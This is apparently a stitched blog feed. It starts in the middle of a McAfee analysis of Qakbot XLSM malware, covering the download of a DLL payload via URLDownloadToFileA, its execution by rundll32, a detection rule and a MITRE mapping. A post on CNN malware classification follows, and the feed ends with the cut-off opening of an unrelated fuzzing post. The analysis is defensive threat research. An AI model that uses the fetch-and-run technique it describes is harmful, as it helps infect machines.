Here the URLDownloadToFIleA API is used to download the payload and the string “JJCCBB” is used to specify data types to call the API. There are multiple URI’s and from one of them, the DLL payload gets downloaded and saved as ..\\lertio.cersw. This DLL payload is then executed using rundll32. All these malicious activities get carried out using various excel based formulas like REGISTER, EXEC, etc. 

Coverage and prevention guidance: 

McAfee’s Endpoint products detect this variant of malware as below: 

The main malicious document with SHA256 (91a1ba70132139c99efd73ca21c4721927a213bcd529c87e908a9fdd71570f1e) is detected as “Downloader-FCEI” with current DAT files. 

Additionally, with the help of McAfee’s Expert rule feature, customers can add a custom behavior rule, specific to this infection pattern. 

Rule { 

    Process { 

        Include OBJECT_NAME { -v “EXCEL.exe” } 


Target { 

        Match PROCESS { 

            Include OBJECT_NAME { -v “rundll32.exe” } 

                      Include PROCESS_CMD_LINE { -v “* ..\\*.*,DllRegisterServer” }  

                            Include -access “CREATE” 




McAfee advises all users to avoid opening any email attachments or clicking any links present in the mail without verifying the identity of the sender. Always disable the Macro execution for Office files. We advise everyone to read our blog on these types of malicious XLSM files and their obfuscation techniques to understand more about the threat. 

Different techniques & tactics are used by the malware to propagate, and we mapped these with the MITRE ATT&CK platform. 

  • T1064(Scripting): Use of Excel 4.0 macros and different excel formulas to download the malicious payload. 
  • Defense Evasion (T1218.011): Execution of Signed binary to abuse Rundll32.exe and proxy executes the malicious code is observed in this Qakbot variant.  
  • Defense Evasion (T1562.001): Office file tries to convince a victim to disable security features by using a clean-looking image. 
  • Command and Control(T1071): Use of Application Layer Protocol HTTP to connect to the web and then downloads the malicious payload. 


XLSM malware has been seen delivering many malware families. Many major families like Trickbot, Gozi, IcedID, Qakbot are using these XLSM macrosheets in high quantity to deliver their payloads. These attacks are still evolving and keep on using various obfuscated strings to exploit various windows utilities like rundll32, regsvr32, PowerShell, etc. 

Due to security concerns, macros are disabled by default in Microsoft Office applications. We suggest it is only safe to enable them when the document received is from a trusted source and macros serve an expected purpose. 

The post XLSM Malware with MacroSheets appeared first on McAfee Blog.

The Rise of Deep Learning for Detection and Classification of Malware

13 August 2021 at 00:50

Co-written by Catherine Huang, Ph.D. and Abhishek Karnik 

Artificial Intelligence (AI) continues to evolve and has made huge progress over the last decade. AI shapes our daily lives. Deep learning is a subset of techniques in AI that extract patterns from data using neural networks. Deep learning has been applied to image segmentation, protein structure, machine translation, speech recognition and robotics. It has outperformed human champions in the game of Go. In recent years, deep learning has been applied to malware analysis. Different types of deep learning algorithms, such as convolutional neural networks (CNN), recurrent neural networks and Feed-Forward networks, have been applied to a variety of use cases in malware analysis using bytes sequence, gray-scale image, structural entropy, API call sequence, HTTP traffic and network behavior.  

Most traditional machine learning malware classification and detection approaches rely on handcrafted features. These features are selected based on experts with domain knowledge. Feature engineering can be a very time-consuming process, and handcrafted features may not generalize well to novel malware. In this blog, we briefly describe how we apply CNN on raw bytes for malware detection and classification in real-world data. 

  1. CNN on Raw Bytes 

Figure 1: CNNs on raw bytes for malware detection and classification

The motivation for applying deep learning is to identify new patterns in raw bytes. The novelty of this work is threefold. First, there is no domain-specific feature extraction and pre-processing. Second, it is an end-to-end deep learning approach. It can also perform end-to-end classification. And it can be a feature extractor for feature augmentation. Third, the explainable AI (XAI) provides insights on the CNN decisions and help human identify interesting patterns across malware families. As shown in Figure 1, the input is only raw bytes and labels. CNN performs representation learning to automatically learn features and classify malware.  

2. Experimental Results 

For the purposes of our experiments with malware detection, we first gathered 833,000 distinct binary samples (Dirty and Clean) across multiple families, compilers and varying “first-seen” time periods. There were large groups of samples from common families although they did utilize varying packers, obfuscators. Sanity checks were performed to discard samples that were corrupt, too large or too small, based on our experiment. From samples that met our sanity check criteria, we extracted raw bytes from these samples and utilized them for conducting multiple experiments. The data was randomly divided into a training and a test set with an 80% / 20% split. We utilized this data set to run the three experiments.  

In our first experiment, raw bytes from the 833,000 samples were fed to the CNN and the performance accuracy in terms of area under receiver operating curve (ROC) was 0.9953.  

One observation with the initial run was that, after raw byte extraction from the 833,000 unique samples, we did find duplicate raw byte entries. This was primarily due to malware families that utilized hash-busting as an approach to polymorphism. Therefore, in our second experiment, we deduplicated the extracted raw byte entries. This reduced the raw byte input vector count to 262,000 samples. The test area under ROC was 0.9920. 

In our third experiment, we attempted multi-family malware classification. We took a subset of 130,000 samples from the original set and labeled 11 categories – the 0th were bucketed as Clean, 1-9 of which were malware families, and the 10th were bucketed as Others. Again, these 11 buckets contain samples with varying packers and compilers. We performed another 80 / 20% random split for the training set and test set. For this experiment, we achieved a test accuracy of 0.9700. The training and test time on one GPU was 26 minutes.  

3. Visual Explanation 

Figure 2: visual explanation using T-SNE and PCA before and after the CNN training
Figure 2: A visual explanation using T-SNE and PCA before and after the CNN training

To understand the CNN training process, we performed a visual analysis for the CNN training. Figure 2 shows the t-Distributed Stochastic Neighbor Embedding (t-SNE) and Principal Component Analysis (PCA) for before and after CNN training. We can see that after training, CNN is able to extract useful representations to capture characteristics of different types of malware as shown in different clusters. There was a good separation for most categories, lending us to believe that the algorithm was useful as a multi-class classifier. 

We then performed XAI to understand CNN’s decisions. Figure 3 shows XAI heatmaps for one sample of Fareit and one sample of Emotet. The brighter the color is the more important the bytes contributing to the gradient activation in neural networks. Thus, those bytes are important to CNN’s decisions. We were interested in understanding the bytes that weighed in heavily on the decision-making and reviewed some samples manually. 

Figure 3: XAI heatmaps on Fareit (left) and Emotet (right)
Figure 3: XAI heatmaps on Fareit (left) and Emotet (right)

4. Human analysis to understand the ML decision and XAI  

Figure 4: Human analysis on CNN’s predictions
Figure 4: Human analysis on CNN’s predictions

To verify if the CNN can learn new patterns, we fed a few never before seen samples to the CNN, and requested a human expert to verify the CNN’s decision on some random samples. The human analysis verified that the CNN was able to correctly identify many malware familiesIn some cases, it identified samples accurately before the top 15 AV vendors based on our internal tests. Figure 4 shows a subset of samples that belong to the Nabucur family that were correctly categorized by the CNN despite having no vendor detection at that point in timeIt’s also interesting to note that our results showed that the CNN was able to currently categorize malware samples across families utilizing common packers into an accurate family bucket. 

Figure 5: domain analysis on sample compiler
Figure 5: domain analysis on sample compiler

We ran domain analysis on the same sample complier VB files. As shown in Figure 5, CNN was able to identify two samples of a threat family before other vendors. CNN agreed with MSMP/other vendors on two samples. In this experiment, the CNN incorrectly identified one sample as Clean.  

Figure 6: Human analysis on an XAI heatmap. Above is the resulting disassembly of part of the decryption tea algorithm from the Hiew tool.
Figure 6: Human analysis on an XAI heatmap. Above is the resulting disassembly of part of the decryption tea algorithm from the Hiew tool.
Above is XAI heatmap for one sample.
Above is XAI heatmap for one sample.

We asked a human expert to inspect an XAI heatmap and verify if those bytes in bright color are associated with the malware family classification. Figure 6 shows one sample which belongs to the Sodinokibi family. The bytes identified by the XAI (c3 8b 4d 08 03 d1 66 c1) are interesting because the byte sequence belongs to part of the Tea decryption algorithm. This indicates these bytes are associated with the malware classification, which confirms the CNN can learn and help identify useful patterns which humans or other automation may have overlooked. Although these experiments were rudimentary, they were indicative of the effectiveness of the CNN in identifying unknown patterns of interest.  

In summary, the experimental results and visual explanations demonstrate that CNN can automatically learn PE raw byte representations. CNN raw byte model can perform end-to-end malware classification. CNN can be a feature extractor for feature augmentation. The CNN raw byte model has the potential to identify threat families before other vendors and identify novel threats. These initial results indicate that CNN’s can be a very useful tool to assist automation and human researcher in analysis and classification. Although we still need to conduct a broader range of experiments, it is encouraging to know that our findings can already be applied for early threat triage, identification, and categorization which can be very useful for threat prioritization.  

We believe that McAfee’s ongoing AI research, such as deep learning-based approaches, leads the security industry to tackle the evolving threat landscape, and we look forward to continuing to share our findings in this space with the security community. 

The post The Rise of Deep Learning for Detection and Classification of Malware appeared first on McAfee Blog.


27 March 2020 at 04:00
layout: post title: Browser Fuzzing tags: [hacking] — Well it fucking happened. I stopped writing to this blog for a while. Who saw that coming? Anyway I’m making a comeback. The delay in posts was caused by 🥁 - me being in the fucking hospital. Some highlights: perfortated intestine, lost...